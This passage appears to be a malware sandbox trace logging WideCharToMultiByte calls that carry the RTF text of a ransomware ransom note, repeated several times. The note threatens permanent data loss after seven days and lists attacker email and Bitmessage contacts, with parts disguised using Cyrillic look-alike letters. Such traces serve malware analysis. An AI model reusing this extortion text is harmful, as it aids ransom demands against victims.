tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" 